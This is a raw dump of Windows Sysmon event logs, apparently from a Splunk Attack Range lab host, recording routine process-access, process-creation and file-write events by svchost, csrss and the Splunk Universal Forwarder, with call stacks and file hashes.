11:18:44.181{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221686Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:18:44.181{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221685Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:18:44.181{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221684Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:18:44.181{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221683Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:18:44.181{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221682Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:18:44.181{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221681Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:18:44.181{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221680Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:18:44.181{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221679Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:18:44.181{4F8D34B0-F11B-6215-0500-000000003902}412428C:\Windows\system32\csrss.exe{4F8D34B0-1814-6216-1D05-000000003902}2720C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000221678Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:18:44.181{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-1814-6216-1D05-000000003902}2720C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000221677Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:18:44.182{4F8D34B0-1814-6216-1D05-000000003902}2720C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000221708Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:18:45.228{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=29C054EF51DD37F4FE96869CBE6A971A,SHA256=8F346EE6F702EB6C0D7E36BBAE9F1002DFEAD05A0C64786666BFADEF5C97163C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297835Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:18:45.211{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F70191C6CF313193F3CDAA070D33CD05,SHA256=980D93DAD56623567988503EB595038289B7260EBFBF208C6688CE4118CCA2DB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221707Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:18:45.196{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=80B95966C8F5090DB4A1EA24758E4328,SHA256=C441C71CAFC7B7D2BD930623AC7D7805086EB2229941D1C89CA3107B20A3D323,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221706Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:18:45.196{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=DE9CD6B56A8595758EAE353E6EBC9192,SHA256=610418CA34229ADE404CE8B003651AE9F271C98D54555260CC7647214E2FAD86,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000221724Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:18:46.868{4F8D34B0-1816-6216-1F05-000000003902}29043240C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000221723Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:18:46.618{4F8D34B0-F11D-6215-2300-000000003902}2036NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=C796F5788518CF0F57AB5C87207C5D14,SHA256=0CE7095FECB35749AB15D15586D728EDDAEC94009FC3FB4FCEDC790B064FF951,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000221722Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:18:46.587{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-1816-6216-1F05-000000003902}2904C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221721Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:18:46.587{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221720Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:18:46.587{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221719Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:18:46.587{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221718Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:18:46.587{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221717Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:18:46.587{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221716Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:18:46.587{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221715Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:18:46.587{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221714Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:18:46.587{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221713Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:18:46.587{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221712Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:18:46.587{4F8D34B0-F11B-6215-0500-000000003902}4121208C:\Windows\system32\csrss.exe{4F8D34B0-1816-6216-1F05-000000003902}2904C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000221711Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:18:46.587{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-1816-6216-1F05-000000003902}2904C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program 